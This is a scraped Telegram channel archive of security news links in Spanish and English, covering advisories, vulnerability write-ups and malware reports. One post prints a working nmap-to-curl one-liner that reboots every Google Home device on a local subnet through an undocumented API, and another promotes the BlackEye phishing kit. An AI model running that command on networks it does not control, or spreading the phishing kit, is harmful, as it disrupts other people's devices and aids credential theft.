es
Feedback
SysAdmin 24x7

SysAdmin 24x7

Ir al canal en Telegram

Noticias y alertas de seguridad informática. Chat y contacto: t.me/sysadmin24x7chat

Mostrar más
4 387
Suscriptores
+124 horas
-47 días
Sin datos30 días
Archivo de publicaciones
Cisco Security: Zero-day in SIP inspection engine of ASA 9.4+ and FTD 6.0+ software. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos

Talos Vulnerability Deep Dive – TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability https://blogs.cisco.com/security/talos/talos-vulnerability-deep-dive-talos-2018-0636-cve-2018-3971-sophos-hitmanpro-alert-vulnerability

Attacking Google Authenticator A story about RFC 6238 https://www.unix-ninja.com/p/attacking_google_authenticator

📃"Ticket-Trick: acceder a cientos de empresas vía Slack con un simple truco" https://blog.segu-info.com.ar/2018/10/ticket-trick-acceder-cientos-de.html Otra de Slack: "Este hacker consiguió acceder a cientos de empresas con un truco absurdamente simple" https://es.gizmodo.com/este-hacker-consiguio-acceder-a-cientos-de-empresas-con-1829749948 #Vulneraciones

📃 "Hello LinuxBoot, Goodbye UEFI: llega la alternativa libre del firmware" https://www.linuxadictos.com/linuxboot.html Tanto el software privativo como el libre pueden tener más o menos la misma cantidad de amenazas de seguridad, para nosotras la diferencia esencial es que en el privativo no siempre lo puedes comprobar a fondo y en el libre sí.

Google Home (in)Security An undocumented API in Google home devices is easily exploitable. This command will reboot any on your local network: nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot https://jerrygamblin.com/2018/10/29/google-home-insecurity/

Security Tip (ST18-005) Proper Disposal of Electronic Devices https://www.us-cert.gov/ncas/tips/ST18-005

Evasión de sandbox en varios plugins de Jenkins Fecha de publicación: 30/10/2018 Importancia: 4 - Alta Recursos afectados:  Pipeline: Groovy Plugin Script Security Plugin Descripción:  Se ha publicado un aviso de seguridad que podría permitir a un atacante la evasión de mecanismos de protección proporcionados por la libreria Groovy Sandbox. https://www.incibe-cert.es/alerta-temprana/avisos-seguridad/evasion-sandbox-varios-plugins-jenkins

Windows Built-in Antivirus Gets Secure Sandbox Mode – Turn It ON https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html

Malware para Mac intercepta tráfico cifrado para publicidad http://unaaldia.hispasec.com/2018/10/malware-para-mac-intercepta-trafico.html

BlackEye, a newly released phishing kit with 32 built-in templates USE FOR EDUCATIONAL PURPOSES ONLY https://github.com/M4cs/BlackEye-Python

systemd: reexec state injection: fgets() on overlong lines leads to line splitting https://bugs.chromium.org/p/project-zero/issues/detail?id=1687

Windows Defender becomes first antivirus to run inside a sandbox Windows Defender with sandbox support rolled out to Windows insiders, but some Windows 10 users can enable it right now. https://www.zdnet.com/article/windows-defender-becomes-first-antivirus-to-run-inside-a-sandbox/